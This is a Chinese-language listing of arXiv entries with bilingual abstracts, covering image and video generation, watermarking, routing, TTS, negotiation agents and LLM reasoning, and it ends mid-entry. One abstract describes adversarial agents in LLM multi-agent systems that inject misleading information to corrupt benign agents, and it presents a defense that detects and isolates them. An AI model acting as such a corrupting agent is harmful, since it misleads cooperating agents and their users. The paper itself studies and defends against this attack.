本报告介绍了Kandinsky 5.0,一系列用于高分辨率图像和10秒视频合成的最先进基础模型。该框架包含三个核心模型系列:Kandinsky 5.0 Image Lite——6B参数的图像生成模型系列,Kandinsky 5.0 Video Lite——快速轻量级的2B参数文本到视频和图像到视频模型,以及Kandinsky 5.0 Video Pro——19B参数模型,实现了卓越的视频生成质量。我们全面回顾了数据策展生命周期——包括收集、处理、过滤和聚类——用于多阶段训练流程,该流程涉及广泛的预训练,并融入了质量增强技术,如自监督微调(SFT)和基于强化学习(RL)的后训练。我们还介绍了新颖的架构、训练和推理优化,使Kandinsky 5.0能够在各种任务上实现高生成速度和最先进的性能,如人类评估所示。作为一个大规模、公开可用的生成框架,Kandinsky 5.0充分利用其预训练及后续阶段的全部潜力,以适应广泛的生成应用。我们希望本报告,连同我们开源代码和训练检查点的发布,将大大促进高质量生成模型的研究社区发展和可访问性。

英文摘要

This report introduces Kandinsky 5.0, a family of state-of-the-art foundation models for high-resolution image and 10-second video synthesis. The framework comprises three core model line-ups: Kandinsky 5.0 Image Lite, a line-up of 6B-parameter image generation models; Kandinsky 5.0 Video Lite, fast and lightweight 2B-parameter text-to-video and image-to-video models; and Kandinsky 5.0 Video Pro, 19B-parameter models that achieve superior video generation quality. We provide a comprehensive review of the data curation lifecycle (collection, processing, filtering, and clustering) for the multi-stage training pipeline, which involves extensive pre-training and incorporates quality-enhancement techniques such as self-supervised fine-tuning (SFT) and reinforcement learning (RL)-based post-training. We also present novel architectural, training, and inference optimizations that enable Kandinsky 5.0 to achieve high generation speeds and state-of-the-art performance across various tasks, as demonstrated by human evaluation. As a large-scale, publicly available generative framework, Kandinsky 5.0 leverages the full potential of its pre-training and subsequent stages to be adapted for a wide range of generative applications. We hope that this report, together with the release of our open-source code and training checkpoints, will substantially advance the development and accessibility of high-quality generative models for the research community.

2511.14075 2026-05-27 cs.LG cs.AI 版本更新

CFG-OEC: Classifier Free Guidance with Orthogonal Error Correction

CFG-OEC: 带正交误差校正的无分类器引导

Nakgyu Yang, Yechan Lee, SooJean Han

发表机构 * School of Electrical Engineering, Korea Advanced Institute of Science and Technology(韩国科学技术院电子工程学院)

AI总结 针对扩散模型中无分类器引导的采样规则与训练目标不匹配导致的误差,提出正交误差校正方法(CFG-OEC)通过减少条件与无条件预测误差的交互项来提升采样质量,并在Stable Diffusion上验证了FID和CLIP分数的改进。

详情
AI中文摘要

无分类器引导是扩散模型中条件采样的标准方法,但其采样规则与训练中使用的目标不一致。这种不匹配通过条件预测误差和无条件预测误差的相互作用引入了结构性采样误差。我们通过将采样误差分解为基础项和由两个误差对齐决定的交叉项来分析该问题。基于此分析,我们提出了带正交误差校正的无分类器引导(CFG-OEC),这是一种减少交互项的结构性修改。对于无法观测到真实噪声的实际场景,我们引入了一个从模型预测计算得到的代理量,以及一种跨扩散时间步稳定校正的动态方法。在受控环境下的实验验证了我们的理论误差分解和代理量构造。在Stable Diffusion v1.5和Stable Diffusion XL上的图像生成表明,CFG-OEC在多个采样器和引导机制下比CFG和CFG++改进了FID和CLIP分数。

英文摘要

Classifier free guidance is a standard method for conditional sampling in diffusion models, but its sampling rule is not aligned with the objective used in training. This mismatch induces a structural sampling error through the interaction of conditional and unconditional prediction errors. We analyze this issue by decomposing the sampling error into a base term and a cross term determined by the alignment of the two errors. Based on this analysis, we propose CFG with orthogonal error correction (CFG-OEC), a structural modification that reduces the interaction term. For practical settings where ground truth noise is not observable, we introduce a proxy computed from model predictions and a dynamic method that stabilizes correction across diffusion timesteps. Experiments in a controlled environment validate our theoretical error decomposition and proxy construction. Image generation on Stable Diffusion v1.5 and Stable Diffusion XL shows that CFG-OEC improves FID and CLIP scores over CFG and CFG++ across multiple samplers and guidance regimes.
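The base-term/cross-term split mentioned above can be illustrated with the standard CFG combination rule. The following is a minimal sketch, not the paper's CFG-OEC method: it assumes the usual guidance formula `eps_uncond + w * (eps_cond - eps_uncond)`, synthetic noise vectors, and hypothetical function names, and it only checks the algebraic identity that the squared error of the guided prediction equals a per-error part plus an inner-product part.

```python
import numpy as np

def cfg_combine(eps_uncond, eps_cond, w):
    """Standard classifier-free guidance: extrapolate from the unconditional
    prediction toward the conditional one with guidance scale w."""
    return eps_uncond + w * (eps_cond - eps_uncond)

def error_terms(eps_true, eps_uncond, eps_cond, w):
    """Split the squared error of the guided prediction into a part that
    depends on each error alone (base) and a part that depends on their
    inner product (cross). Names are illustrative, not from the paper."""
    e_u = eps_uncond - eps_true   # unconditional prediction error
    e_c = eps_cond - eps_true     # conditional prediction error
    base = (1 - w) ** 2 * np.dot(e_u, e_u) + w ** 2 * np.dot(e_c, e_c)
    cross = 2 * w * (1 - w) * np.dot(e_u, e_c)
    return base, cross

# Synthetic example: the "true" noise is known only because we generate it.
rng = np.random.default_rng(0)
eps_true = rng.normal(size=16)
eps_uncond = eps_true + 0.3 * rng.normal(size=16)
eps_cond = eps_true + 0.1 * rng.normal(size=16)
w = 7.5

guided = cfg_combine(eps_uncond, eps_cond, w)
total = np.sum((guided - eps_true) ** 2)
base, cross = error_terms(eps_true, eps_uncond, eps_cond, w)
```

When the two errors are orthogonal, the cross part vanishes, which is the intuition behind reducing the interaction term; how CFG-OEC estimates this without access to the true noise is described in the paper and is not reproduced here.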

2511.07667 2026-05-27 cs.AI 版本更新

AI-Driven Contribution Evaluation and Conflict Resolution: A Framework & Design for Group Workload Investigation

AI驱动的贡献评估与冲突解决:群体工作量调查的框架与设计

Jakub Slapek, Mir Seyedebrahimi, Jianhua Yang

发表机构 * University of Warwick(沃里克大学) Warwick Manufacturing Group(沃里克制造集团)

AI总结 提出一个AI增强的框架和实现设计,通过整合异构工件并利用大语言模型进行验证和上下文分析,以解决团队中个人贡献的公平评估和冲突解决难题。

Comments 20 pages, 8 figures, 8 tables

详情
AI中文摘要

团队中个人贡献的公平评估仍然是一个持续的挑战,工作量的冲突和差异可能导致不公平的绩效评估,通常需要人工干预——这是一个成本高昂且困难的过程。我们调查了现有工具的功能,并发现了冲突解决方法和AI集成方面的空白。为了解决这个问题,我们提出了一种新颖的AI增强工具的框架和实现设计,该工具协助争议调查。该框架将异构工件——提交物(代码、文本、媒体)、通信(聊天、电子邮件)、协调记录(会议日志、任务)、同行评估和上下文信息——组织成三个维度,包含九个基准:贡献、互动和角色。客观度量被归一化,按维度聚合,并与不平等度量(基尼指数)配对,以揭示冲突标记。大语言模型(LLM)架构对这些度量进行验证和上下文分析,以生成可解释且透明的咨询判断。我们论证了在当前法规和机构政策下的可行性,并概述了实际分析(情感、任务忠实度、字数/行数等)、偏见防护、限制和实际挑战。

英文摘要

The equitable assessment of individual contribution in teams remains a persistent challenge, where conflict and disparity in workload can result in unfair performance evaluation, often requiring manual intervention - a costly and challenging process. We survey existing tool features and identify a gap in conflict resolution methods and AI integration. To address this, we propose a framework and implementation design for a novel AI-enhanced tool that assists in dispute investigation. The framework organises heterogeneous artefacts - submissions (code, text, media), communications (chat, email), coordination records (meeting logs, tasks), peer assessments, and contextual information - into three dimensions with nine benchmarks: Contribution, Interaction, and Role. Objective measures are normalised, aggregated per dimension, and paired with inequality measures (Gini index) to surface conflict markers. A Large Language Model (LLM) architecture performs validated and contextual analysis over these measures to generate interpretable and transparent advisory judgments. We argue for feasibility under current statutory and institutional policy, and outline practical analytics (sentimental, task fidelity, word/line count, etc.), bias safeguards, limitations, and practical challenges.
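The pairing of normalised measures with a Gini index can be sketched as follows. This is an illustrative example under stated assumptions: the function name and the sample workload numbers are hypothetical, and the formula is the textbook Gini index based on pairwise absolute differences, not necessarily the exact variant used in the paper.

```python
def gini(values):
    """Gini index of non-negative values: 0 means perfectly equal shares,
    and values approaching 1 mean one member accounts for almost everything."""
    n = len(values)
    total = sum(values)
    if n == 0 or total == 0:
        return 0.0
    # Sum of absolute differences over all ordered pairs, divided by
    # 2 * n^2 * mean, which equals 2 * n * total.
    diff_sum = sum(abs(a - b) for a in values for b in values)
    return diff_sum / (2 * n * total)

# Hypothetical per-member contribution scores for a four-person team.
balanced_team = [25, 25, 25, 25]
skewed_team = [0, 0, 0, 100]
```

A high value on one dimension would only flag a possible conflict for further investigation; it does not by itself establish who contributed what.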

2511.04711 2026-05-27 cs.CR cs.AI cs.LG 版本更新

SWAP: Towards Copyright Auditing of Soft Prompts via Sequential Watermarking

SWAP:通过顺序水印实现软提示的版权审计

Wenyuan Yang, Yichen Sun, Changzheng Chen, Zhixuan Chu, Jiaheng Zhang, Yiming Li, Dacheng Tao

发表机构 * Sun Yat-sen University(中山大学) Zhejiang University(浙江大学) National University of Singapore(新加坡国立大学) Nanyang Technological University(南洋理工大学)

AI总结 针对软提示的版权保护问题,提出一种基于顺序水印的审计方法SWAP,通过将水印嵌入到更复杂的输出分布顺序空间中,实现无害且鲁棒的版权验证。

Comments This paper has been accepted by the International Journal of Computer Vision (IJCV), 2026. The first two authors contributed equally to this work. 28 pages

详情
AI中文摘要

大规模视觉语言模型,尤其是CLIP,在各种下游任务中展现了卓越的性能。软提示作为精心设计的模块,能够高效地将视觉语言模型适应特定任务,因此需要有效的版权保护。本文通过审计可疑的第三方模型是否使用了受保护的软提示,来研究模型版权保护。虽然这可以视为模型所有权审计的一个特例,但我们的分析表明,由于提示学习的独特特性,现有技术效果不佳。非侵入式审计在独立模型与受害模型共享相似数据分布时,本质上容易产生误报。侵入式方法也失败:为CLIP设计的后门方法无法嵌入功能性触发器,而将传统DNN后门技术扩展到提示学习则面临有害性和模糊性挑战。我们发现,侵入式审计的这些失败源于同一个根本原因:水印与主任务在同一决策空间中运行,却追求相反的目标。基于这些发现,我们提出了软提示的顺序水印(SWAP),将水印植入一个不同且更复杂的空间。SWAP通过防御者指定的分布外类别的特定顺序来编码水印,灵感来自CLIP的零样本预测能力。这种嵌入在更复杂空间中的水印保持原始预测标签不变,从而减少与主任务的冲突。我们进一步为SWAP设计了基于假设检验的验证协议,并提供了验证何时有效的理论分析。在11个数据集上的大量实验证明了SWAP的有效性、无害性以及对潜在攻击的鲁棒性。

英文摘要

Large-scale vision-language models, especially CLIP, have demonstrated remarkable performance across diverse downstream tasks. Soft prompts, as carefully crafted modules that efficiently adapt vision-language models to specific tasks, necessitate effective copyright protection. In this paper, we investigate model copyright protection by auditing whether suspicious third-party models incorporate protected soft prompts. While this can be viewed as a special case of model ownership auditing, our analysis shows that existing techniques are ineffective due to prompt learning's unique characteristics. Non-intrusive auditing is inherently prone to false positives when independent models share similar data distributions with victim models. Intrusive approaches also fail: backdoor methods designed for CLIP cannot embed functional triggers, while extending traditional DNN backdoor techniques to prompt learning suffers from harmfulness and ambiguity challenges. We find that these failures in intrusive auditing stem from the same fundamental reason: watermarking operates within the same decision space as the primary task yet pursues opposing objectives. Motivated by these findings, we propose sequential watermarking for soft prompts (SWAP), which implants watermarks into a different and more complex space. SWAP encodes watermarks through a specific order of defender-specified out-of-distribution classes, inspired by the zero-shot prediction capability of CLIP. This watermark, which is embedded in a more complex space, keeps the original prediction label unchanged, making it less opposed to the primary task. We further design a hypothesis-test-guided verification protocol for SWAP and provide a theoretical analysis of when verification works. Extensive experiments on 11 datasets demonstrate SWAP's effectiveness, harmlessness, and robustness against potential attacks.

2511.02525 2026-05-27 cs.LG cs.AI 版本更新

An End-to-End Learning Approach for Solving Capacitated Location-Routing Problems

一种用于求解带容量约束选址-路径问题的端到端学习方法

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * National Key Lab of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(北京理工大学自主智能无人系统全国重点实验室)

AI总结 提出基于深度强化学习与异构查询机制(DRLHQ)的端到端方法,首次将编码器-解码器结构应用于带容量约束的选址-路径问题(CLRP)及其开放变体(OCLRP),通过异构查询注意力机制动态协调选址与路径决策,在合成和基准数据集上优于传统方法和现有DRL基线。

详情
AI中文摘要

带容量约束的选址-路径问题(CLRPs)是组合优化中的经典问题,需要同时做出选址和路径决策。在CLRPs中,复杂的约束以及各种决策之间的复杂关系使得问题难以求解。随着深度强化学习(DRL)的出现,它已被广泛应用于解决车辆路径问题及其变体,而与CLRPs相关的研究仍有待探索。在本文中,我们提出了带有异构查询的DRL(DRLHQ)来分别求解CLRP和开放CLRP(OCLRP)。我们是首个为CLRPs提出端到端学习方法的工作,遵循编码器-解码器结构。具体而言,我们将CLRPs重新表述为一个针对各种决策量身定制的马尔可夫决策过程,这是一个通用的建模框架,可适用于其他基于DRL的方法。为了更好地处理选址和路径决策之间的相互依赖关系,我们还引入了一种新颖的异构查询注意力机制,旨在动态适应不同的决策阶段。在合成和基准数据集上的实验结果表明,我们提出的方法在求解CLRP和OCLRP时,相较于代表性的传统方法和基于DRL的基线,具有更优的解质量和更好的泛化性能。

英文摘要

Capacitated location-routing problems (CLRPs) are classical problems in combinatorial optimization that require making location and routing decisions simultaneously. In CLRPs, the complex constraints and the intricate relationships between decisions make the problem challenging to solve. Deep reinforcement learning (DRL) has been applied extensively to the vehicle routing problem and its variants, while research on CLRPs remains underexplored. In this paper, we propose DRL with heterogeneous query (DRLHQ) to solve both the CLRP and the open CLRP (OCLRP). We are the first to propose an end-to-end learning approach for CLRPs, following the encoder-decoder structure. In particular, we reformulate CLRPs as a Markov decision process tailored to the various decisions, a general modeling framework that can be adapted to other DRL-based methods. To better handle the interdependency between location and routing decisions, we also introduce a novel heterogeneous querying attention mechanism designed to adapt dynamically to the different decision-making stages. Experimental results on both synthetic and benchmark datasets demonstrate superior solution quality and better generalization performance of our proposed approach over representative traditional and DRL-based baselines in solving both CLRP and OCLRP.

2510.19420 2026-05-27 cs.CR cs.AI cs.LG cs.MA math.OC 版本更新

Securing Multi-Agent Systems Against Corruptions via Node Contribution Backpropagation

通过节点贡献反向传播保护多智能体系统免受恶意破坏

Chengcan Wu, Zhixin Zhang, Mingqian Xu, Zeming Wei, Meng Sun

发表机构 * Peking University(北京大学)

AI总结 针对多智能体系统中对抗性智能体注入误导信息的问题,提出一种基于有向无环图的反向传播动态防御方法,通过计算每个智能体对最终决策的贡献来识别和隔离恶意智能体,实验表明该方法优于现有防御机制。

Comments ICML 2026

详情
AI中文摘要

多智能体系统(MAS)已成为大型语言模型(LLM)应用的普遍范式。然而,MAS中复杂的多智能体设计引入了独特的可信度问题:对抗性智能体可以注入误导信息,这些信息通过系统传染性地传播,破坏良性智能体并导致错误输出。现有的基于图的防御将智能体建模为节点,通信建模为边,但仅限于静态图防御。在本文中,我们提出了一种动态防御范式,将MAS通信建模为带符号的有向无环图,并通过反向传播计算每个智能体对最终决策的贡献,从而能够准确识别和隔离恶意智能体,以保护多智能体任务协作。在复杂和动态的MAS环境中的实验结果表明,我们的方法显著优于现有的MAS防御机制,为可信赖的MAS部署提供了有效的保障。我们的代码可在https://github.com/ChengcanWu/BPD获取。

英文摘要

Multi-Agent Systems (MAS) have become a prevalent paradigm for Large Language Model (LLM) applications. However, the complex multi-agent design in MAS introduces unique trustworthiness concerns: adversarial agents can inject misleading information that propagates contagiously through the system, corrupting benign agents and leading to false outputs. Existing graph-based defenses model agents as nodes and communications as edges, yet are limited to static-graph defenses. In this paper, we propose a dynamic defense paradigm that models MAS communication as a signed directed acyclic graph and computes each agent's contribution to the final decision via backward propagation, enabling accurate identification and isolation of malicious agents to secure multi-agent task collaboration. Experimental results in complex and dynamic MAS environments demonstrate that our method notably outperforms existing MAS defense mechanisms, providing an effective guardrail for trustworthy MAS deployment. Our code is available at https://github.com/ChengcanWu/BPD.

2510.10774 2026-05-27 cs.SD cs.AI cs.HC cs.LG 版本更新

ParsVoice: A Large-Scale Multi-Speaker Persian Speech Corpus for Text-to-Speech Synthesis

ParsVoice: 面向文本到语音合成的大规模多说话人波斯语语音语料库

Mohammad Javad Ranjbar Kalahroodi, Heshaam Faili, Azadeh Shakery

发表机构 * School of Electrical and Computer Engineering, University of Tehran(德黑兰大学电气与计算机工程学院) Institute for Research in Fundamental Sciences (IPM)(基础科学研究所(IPM))

AI总结 提出ParsVoice,目前最大的公开波斯语语音-文本语料库,通过可扩展的流水线从长篇有声读物构建高质量数据,用于训练多说话人TTS系统,并验证了其在零样本多说话人TTS中的有效性。

详情
AI中文摘要

波斯语在开放的语音-文本资源中仍然严重不足,限制了多说话人文本到语音(TTS)、语音语言建模和低资源语音处理的进展。我们介绍了ParsVoice,这是目前最大的公开波斯语语音-文本语料库,专为训练多说话人TTS系统而设计,同时提供了一个可扩展的流水线,用于从长篇有声读物录音中构建高质量的语音-文本数据。该流水线结合了微调的ParsBERT句子补全分类器、基于ASR的边界优化、标点恢复、说话人识别以及涵盖音频和波斯语特定文本属性的多维质量评估。最终发布的版本包含一个2200小时的TTS就绪子集,包含来自1815个自动识别说话人ID的136万个对齐片段,比之前最大的公开波斯语TTS数据集大25倍以上。为了验证该语料库,我们微调了XTTS,一个直接操作原始波斯语文本(无需音素表示)的零样本多语言TTS模型,实现了自然度MOS为3.6/5,说话人相似度MOS为4.0/5。ParsVoice数据集公开在:https://huggingface.co/datasets/MohammadJRanjbar/ParsVoice。

英文摘要

Persian remains substantially underrepresented in open speech-text resources, limiting progress in multi-speaker text-to-speech (TTS), speech-language modelling, and low-resource speech processing. We introduce ParsVoice, the largest publicly available Persian speech-text corpus tailored for training multi-speaker TTS systems, along with a scalable pipeline to construct high-quality speech-text data from long-form audiobook recordings. The pipeline combines a fine-tuned ParsBERT sentence-completion classifier, ASR-based boundary optimization, punctuation restoration, speaker identification, and a multi-dimensional quality assessment that covers both audio and Persian-specific text properties. The resulting release contains a 2,200-hour TTS-ready subset with 1.36 million aligned segments from 1,815 automatically identified speaker IDs, making it more than 25 times larger than the previously largest open Persian TTS dataset. To validate the corpus, we fine-tune XTTS, a zero-shot multilingual TTS model that operates directly on raw Persian text without phoneme representations, achieving a naturalness MOS of 3.6/5 and speaker similarity MOS of 4.0/5. The ParsVoice dataset is publicly available at: https://huggingface.co/datasets/MohammadJRanjbar/ParsVoice.

2509.04310 2026-05-27 cs.AI 版本更新

EvoEmo: Towards Evolved Emotional Policies for Adversarial LLM Agents in Multi-Turn Price Negotiation

EvoEmo:面向多轮价格谈判中对抗性LLM智能体的进化情感策略

Yunbo Long, Liming Xu, Lukas Beckenbauer, Yuhan Liu, Alexandra Brintrup

发表机构 * Department of Engineering, University of Cambridge(剑桥大学工程系) Rotman School of Management, University of Toronto(多伦多大学罗特曼管理学院) TUM School of Management, Technical University of Munich(慕尼黑工业大学管理学院) The Alan Turing Institute, London, UK(伦敦艾伦·图灵研究所)

AI总结 提出EvoEmo进化强化学习框架,通过将情感状态转移建模为马尔可夫决策过程并采用种群遗传优化,动态优化多轮谈判中的情感表达,显著提升LLM智能体的谈判成功率、效率和买家节省。

详情
AI中文摘要

最近关于大型语言模型(LLM)中思维链(CoT)推理的研究表明,智能体可以参与复杂的多轮谈判,为智能体AI开辟了新途径。然而,现有的LLM智能体在很大程度上忽略了情感在此类谈判中的功能作用,而是生成被动、偏好驱动的情感反应,使其容易受到对抗方的操纵和策略性利用。为弥补这一差距,我们提出了EvoEmo,一个进化强化学习框架,用于优化谈判中的动态情感表达。EvoEmo将情感状态转移建模为马尔可夫决策过程,并采用基于种群的遗传优化,在多样化的谈判场景中进化出高奖励的情感策略。我们进一步提出了一个评估框架,包含两个基线(原始策略和固定情感策略),用于基准测试情感感知谈判。大量实验和消融研究表明,EvoEmo在成功率、效率和买家节省方面均持续优于两个基线。这一发现强调了适应性情感表达在使LLM智能体更有效地进行多轮谈判中的重要性。代码可在https://github.com/Yunbo-max/EvoEmo获取。

英文摘要

Recent research on Chain-of-Thought (CoT) reasoning in Large Language Models (LLMs) has demonstrated that agents can engage in complex, multi-turn negotiations, opening new avenues for agentic AI. However, existing LLM agents largely overlook the functional role of emotions in such negotiations, instead generating passive, preference-driven emotional responses that make them vulnerable to manipulation and strategic exploitation by adversarial counterparts. To address this gap, we present EvoEmo, an evolutionary reinforcement learning framework that optimizes dynamic emotional expression in negotiations. EvoEmo models emotional state transitions as a Markov Decision Process and employs population-based genetic optimization to evolve high-reward emotion policies across diverse negotiation scenarios. We further propose an evaluation framework with two baselines (vanilla strategies and fixed-emotion strategies) for benchmarking emotion-aware negotiation. Extensive experiments and ablation studies show that EvoEmo consistently outperforms both baselines, achieving higher success rates, higher efficiency, and increased buyer savings. These findings highlight the importance of adaptive emotional expression in enabling more effective LLM agents for multi-turn negotiation. The code is available at https://github.com/Yunbo-max/EvoEmo.

2506.23274 2026-05-27 cs.LG cs.AI 版本更新

Real-Time Progress Prediction in Reasoning Language Models

推理语言模型中的实时进度预测

Hans Peter Lyngsøe Raaschou-Jensen, Constanza Fierro, Anders Søgaard

发表机构 * Department of Computer Science, University of Copenhagen(哥本哈根大学计算机科学系)

AI总结 研究通过离散化推理轨迹训练线性探针和微调模型生成0-100%进度估计,实现推理语言模型中的实时进度预测,并在数学推理任务上达到0.161 MAE。

详情
AI中文摘要

最近的推理语言模型,特别是那些采用长潜在思维链的模型,在复杂的智能体任务上表现出色。然而,随着这些模型在越来越长的时间范围内运行,其内部进展对用户变得不透明,使得期望管理和实时监督变得困难。在这项工作中,我们研究了对此类模型进行实时进度预测的可行性。我们首先通过离散化推理轨迹并训练线性探针对推理状态进行分类,测试隐藏状态是否编码进度信息。然后,我们微调模型以在思维链推理过程中生成0-100%的进度估计。我们最强的进度报告检查点在数学推理轨迹上达到了0.161的平均绝对误差,并在此设置中优于位置基线。最后,我们通过测量相同部分展开中隐含进度值的变化程度,量化了进度标签的内在模糊性。这种模糊性在Qwen3-4B中最低,其延续产生的展开离散度最小,表明更大的模型可以通过减少剩余解决方案长度的变化来使进度标签更稳定。

英文摘要

Recent reasoning language models, particularly those that employ long latent chains of thought, achieve strong performance on complex agentic tasks. However, as these models operate over increasingly long time horizons, their internal progress becomes opaque to users, making expectation management and real-time oversight difficult. In this work, we investigate whether real-time progress prediction is feasible for such models. We first test whether hidden states encode progress information by discretizing reasoning trajectories and training a linear probe to classify reasoning states. We then fine-tune models to generate progress estimates from 0-100% during chain-of-thought reasoning. Our strongest progress-reporting checkpoint reaches 0.161 MAE on mathematical reasoning traces and outperforms position baselines in this setting. Finally, we quantify the intrinsic ambiguity of progress labels by measuring how much the implied progress value varies from the same partial rollout. This ambiguity is lowest for Qwen3-4B, whose continuations produce the smallest rollout dispersion, suggesting that larger models can make progress labels more stable by reducing variation in remaining solution length.
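To make the MAE figure concrete, the sketch below scores progress estimates against true progress, where true progress is taken to be the fraction of the final trace already generated. This is an assumption for illustration; the abstract does not define the label construction or the position baselines, so `position_baseline` and the sample numbers are hypothetical.

```python
def true_progress(tokens_so_far, final_length):
    """Fraction of the finished reasoning trace generated so far (0.0 to 1.0)."""
    return tokens_so_far / final_length

def position_baseline(tokens_so_far, expected_length):
    """Hypothetical baseline: guess progress from position alone, assuming
    every trace has the same expected length."""
    return min(1.0, tokens_so_far / expected_length)

def mean_absolute_error(predicted, actual):
    """Average absolute gap between predicted and actual progress."""
    return sum(abs(p - a) for p, a in zip(predicted, actual)) / len(actual)

# One trace that ends after 200 tokens, inspected at four checkpoints.
checkpoints = [50, 100, 150, 200]
actual = [true_progress(t, 200) for t in checkpoints]
baseline = [position_baseline(t, 400) for t in checkpoints]
baseline_mae = mean_absolute_error(baseline, actual)
```

On a 0 to 1 scale, an MAE of 0.161 would correspond to estimates that are off by about 16 percentage points on average.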

2510.06843 2026-05-27 cs.CL cs.AI 版本更新

Self-signals Driven Multi-LLM Debate for Efficient and Accurate Reasoning

自信号驱动的多LLM辩论以实现高效准确的推理

Xuhang Chen, Zhifan Song, Deyi Ji, Shuo Gao, Lanyun Zhu

发表机构 * University of Cambridge(剑桥大学) Sorbonne Université(索邦大学) University of Science and Technology of China(中国科学技术大学) Beihang University(北京航空航天大学) Nanyang Technological University(南洋理工大学)

AI总结 提出一种利用模型级置信度和token级语义焦点两种自信号来自适应引导多LLM辩论过程的方法,在提高准确性的同时减少token消耗。

详情
AI中文摘要

大型语言模型(LLMs)在多样化的应用领域展现了令人印象深刻的能力。最近的工作探索了多LLM智能体辩论(MAD),通过使多个LLM迭代讨论和细化响应来增强性能。然而,现有的MAD方法主要关注利用外部结构(如辩论图)和LLM作为评判者,而忽略了生成过程中出现的自信号(如token logits和注意力)。这种遗漏导致了冗余计算和潜在的性能下降。在本文中,我们将重点转移到多LLM辩论的自信号上,并引入了一种自信号驱动的多LLM辩论(SID),它利用两种类型的自信号:模型级置信度和token级语义焦点,来自适应地引导辩论过程。我们的方法使高置信度智能体能够在模型级别提前退出,并基于注意力机制压缩冗余辩论内容。我们在多个具有挑战性的基准测试上,对各种LLMs和多模态LLMs评估了我们的方法。实验结果表明,我们的方法不仅在准确性上优于现有的MAD技术,而且还减少了token消耗,突显了利用自信号在提高多智能体辩论系统的性能和效率方面的有效性。我们的代码将在https://github.com/xuhang2019/SID上提供。

英文摘要

Large Language Models (LLMs) have exhibited impressive capabilities across diverse application domains. Recent work has explored Multi-LLM Agent Debate (MAD) as a way to enhance performance by enabling multiple LLMs to discuss and refine responses iteratively. Nevertheless, existing MAD methods predominantly focus on utilizing external structures, such as debate graphs, using LLM-as-a-Judge, while neglecting the application of self signals, such as token logits and attention, that arise during generation. This omission leads to redundant computation and potential performance degradation. In this paper, we shift the focus to the self signals of multi-LLM debate and introduce a Self-Signals Driven Multi-LLM Debate (SID), which leverages two types of self-signals: model-level confidence and token-level semantic focus, to adaptively guide the debate process. Our approach enables high-confidence agents to exit early at the model level and compress the redundant debate contents based on the attention mechanism. We evaluate our method on various LLMs and Multimodal LLMs across multiple challenging benchmarks. Experimental results demonstrate that our method not only outperforms existing MAD techniques in accuracy but also reduces token consumption, highlighting the effectiveness of utilizing self signals in enhancing both the performance and efficiency of multi-agent debate systems. Our code will be available at https://github.com/xuhang2019/SID.

2510.06381 2026-05-27 cs.LG cs.AI 版本更新

Monte Carlo Permutation Search

蒙特卡洛排列搜索

Tristan Cazenave

AI总结 提出一种改进GRAVE算法的通用蒙特卡洛树搜索算法MCPS,通过利用路径上所有节点的统计信息,在多种游戏中优于GRAVE,并给出了统计权重公式的数学推导。

详情
AI中文摘要

我们提出蒙特卡洛排列搜索(MCPS),一种改进GRAVE算法的通用蒙特卡洛树搜索(MCTS)算法。当深度强化学习不可行或游戏前可用计算资源有限时(如通用游戏博弈),MCPS具有相关性。MCPS的原理是在节点的探索项中包含从根节点到该节点路径上所有走法的所有模拟的统计信息。我们在多种游戏上测试MCPS:Hex、Go、AtariGo、NoGo和一个Wargame。MCPS几乎总是优于GRAVE。我们还提供了用于加权三种统计来源的公式的数学推导。这些公式是对GRAVE公式的改进,因为它们不再使用GRAVE的偏差超参数。

英文摘要

We propose Monte Carlo Permutation Search (MCPS), a general-purpose Monte Carlo Tree Search (MCTS) algorithm that improves upon the GRAVE algorithm. MCPS is relevant when deep reinforcement learning is not an option or when the computing power available before play is not substantial, such as in General Game Playing. The principle of MCPS is to include in the exploration term of a node the statistics on all the playouts that contain all the moves on the path from the root to the node. We test MCPS on a variety of games: Hex, Go, AtariGo, NoGo and a Wargame. MCPS almost always outperforms GRAVE. We also provide a mathematical derivation of the formulas used for weighting the three sources of statistics. These formulas are an improvement on the GRAVE formula since they no longer use the bias hyperparameter of GRAVE.

2510.01833 2026-05-27 cs.AI cs.CL 版本更新

Plan Then Action: High-Level Planning Guidance Reinforcement Learning for LLM Reasoning

先规划后行动:面向LLM推理的高层规划引导强化学习

Zhihao Dou, Qinjian Zhao, Zhongwei Wan, Dinggen Zhang, Weida Wang, Towsif Raiyan, Benteng Chen, Qingtao Pan, Yang Ouyang, Chaoda Song, Zhiqiang Gao, Shufei Zhang, Sumon Biswas

发表机构 * Case Western Reserve University, Cleveland, OH, USA(凯斯西储大学) Kean University, Union, NJ, USA(凯恩大学) The Ohio State University, Columbus, OH, USA(俄亥俄州立大学) Fudan University, Shanghai, China(复旦大学) Shanghai Artificial Intelligence Laboratory, Shanghai, China(上海人工智能实验室) The University of Hong Kong, Hong Kong, China(香港大学) North Carolina State University, Raleigh, NC, USA(北卡罗来纳州立大学)

AI总结 提出PTA-GRPO两阶段框架,通过高层规划引导与强化学习联合优化,提升LLM在数学和自然科学推理任务中的准确性和泛化能力。

Comments 19 pages and 5 figures

详情
AI中文摘要

大型语言模型(LLMs)通过思维链(CoT)展现出强大的推理能力,但其token级别的生成倾向于局部决策,缺乏全局规划,常常导致冗余或不准确的推理。现有方法(如基于树的搜索和强化学习)试图解决这一问题,但计算成本高,且仍难以产生可靠的推理轨迹。为应对这些挑战,我们提出先规划后行动增强推理与组相对策略优化(PTA-GRPO),这是一个两阶段框架,旨在联合改进高层规划和细粒度CoT推理。具体而言,在第一阶段,给定LLM负责将CoT推理总结为紧凑的高层指导,然后用于监督微调。接着,我们引入一种指导感知的强化学习方法,联合优化最终输出和指导质量,提升推理效果。我们在数学和自然科学的十个推理基准上,使用五个覆盖多种数据模态的多样化基础模型进行评估。结果表明,PTA-GRPO在模型和任务上持续带来显著改进,展现出强大的有效性和泛化能力。

英文摘要

Large language models (LLMs) demonstrate strong reasoning abilities via Chain-of-Thought (CoT), but their token-level generation encourages local decisions and lacks global planning, often leading to redundant or inaccurate reasoning. Existing methods, such as tree-based search and reinforcement learning (RL), attempt to address this issue but incur high computational costs and still struggle to produce reliable reasoning trajectories. To address these challenges, we propose Plan-Then-Action Enhanced Reasoning with Group Relative Policy Optimization (PTA-GRPO), a two-stage framework designed to jointly improve high-level planning and fine-grained CoT reasoning. Specifically, in the first stage, a given LLM is responsible for summarizing CoT reasoning into compact high-level guidance, which is then leveraged for supervised fine-tuning. Then, we introduce a guidance-aware reinforcement learning method that jointly optimizes the final output and the quality of guidance, enhancing reasoning effectiveness. We evaluate PTA-GRPO on ten reasoning benchmarks across mathematics and natural sciences, using five diverse base models spanning multiple data 